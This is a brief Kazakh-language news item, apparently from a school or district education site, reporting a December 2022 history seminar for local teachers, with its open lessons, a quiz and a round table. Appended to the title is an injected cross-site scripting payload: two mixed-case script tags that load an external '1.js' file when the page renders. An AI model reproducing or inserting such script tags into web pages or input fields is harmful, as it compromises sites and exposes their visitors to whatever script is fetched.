Тарих бойынша семинар<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
19.12.2022
Жақсы ауданы білім бөлімінің әдістемелік кабинетінің жоспарына сәйкес 2022 жылдың 15 желтоқсан күні «Ақмола облысы білім басқармасының Жақсы ауданы бойынша білім бөлімі Жаңа Қима ауылының Ғ. Әбдірахманов атындағы жалпы орта білім беретін мектебі» КММ-інде тарих пәнінен семинар өткізілді. Семинарға аудан мектептерінен 24 тарих пәнінің мұғалімдері қатысты. Семинардың тақырыбы: «Тарих пәнін оқытудың жаңашыл, тиімді әдістері». Семинардың ашылу кезеңінде мектеп оқушылары қатысушыларға тілектерін өлең жолдарымен, әнмен, бимен жеткізіп, кіріспе сөзді әдіскер Ә.А.Мұратбекке берді. Семинар бағдарламасына сай ашық сабақтар: «ХХ ғасырдың 40-80 жылдарындағы ғалымдардың дамытудағы жетістіктері» Ериков К. З., «Древние религиозные верования» Карибаев Ж. С., сабақтан тыс іс-шара «Интеллектуалды викторина» Оразалы Т. Ж., дөңгелек үстел «Дебаты: теория и практика» Отегенова Ж. Ж. өткізіліп, тарих пәнін өткізудің басты мақсаттардың бірі - оқушылардың бойында тарихи ойлау дағдыларын қалыптастыру мен дамытуға мүмкіндік беретін әдіс-тәсілдер қолданылды. Мектеп мұражайы мен кітапханаға экскурсия жасалды. Семинар соңында аудандық әдістемелік бірлестік жетекшісі Асылбеков А. Ш. қорытынды жасады.